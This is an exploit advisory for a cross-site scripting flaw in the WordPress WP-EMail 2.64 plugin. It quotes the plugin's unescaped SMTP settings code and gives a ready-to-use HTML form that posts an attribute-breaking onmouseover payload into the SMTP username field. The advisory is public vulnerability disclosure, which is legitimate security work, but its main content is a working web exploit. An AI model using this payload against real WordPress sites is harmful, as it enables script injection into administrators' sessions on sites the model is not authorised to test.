######################

Exploit Title : Wordpress WP-EMail 2.64 Cross Site Scripting

Exploit Author : Ashiyane Digital Security Team

Vendor Homepage : https://wordpress.org/plugins/wp-email/

Date : 2015-01-03

Software Link : https://downloads.wordpress.org/plugin/wp-email.2.64.zip

Tested on : Windows 7 / Mozilla Firefox

######################

Location : http://localhost/wordpress/wp-admin/admin.php?page=wp-email/email-options.php

######################

Vulnerable code :

<table class="form-table">

<tr>

<th width="20%"><?php _e('SMTP Username:', 'wp-email'); ?></th>

<td><input type="text" name="email_smtp_name" value="<?php echo

stripslashes($email_smtp['username']); ?>" size="30" dir="ltr" /></td>

</tr>

<tr>

<th width="20%"><?php _e('SMTP Password:', 'wp-email'); ?></th>

<td><input type="password" name="email_smtp_password" value="<?php echo

stripslashes($email_smtp['password']); ?>" size="30" dir="ltr" /></td>

</tr>

<tr>

<th width="20%"><?php _e('SMTP Server:', 'wp-email'); ?></th>

<td><input type="text" name="email_smtp_server" value="<?php echo

stripslashes($email_smtp['server']); ?>" size="30" dir="ltr" /><br /><?php

_e('You may leave the above fields blank if you do not use a SMTP server.', 'wp-email'); ?></td>

</tr>

</table>

#####################



Exploit Code:



<html>

<body>

<form method="post"

action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=wp-email/email-options.php"&gt;

<input type="hidden" name="email_smtp_name" value='"

style="a:b;margin-top:-1000px;margin-left:-100px;width:4000px;height:4000px;display:block;"

onmouseover=alert(1); a="'/>

<input type="submit" name="Submit" class="button" value="Save Changes" />

</form>

</body>

</html>



#####################



Discovered By : Nc_521



#####################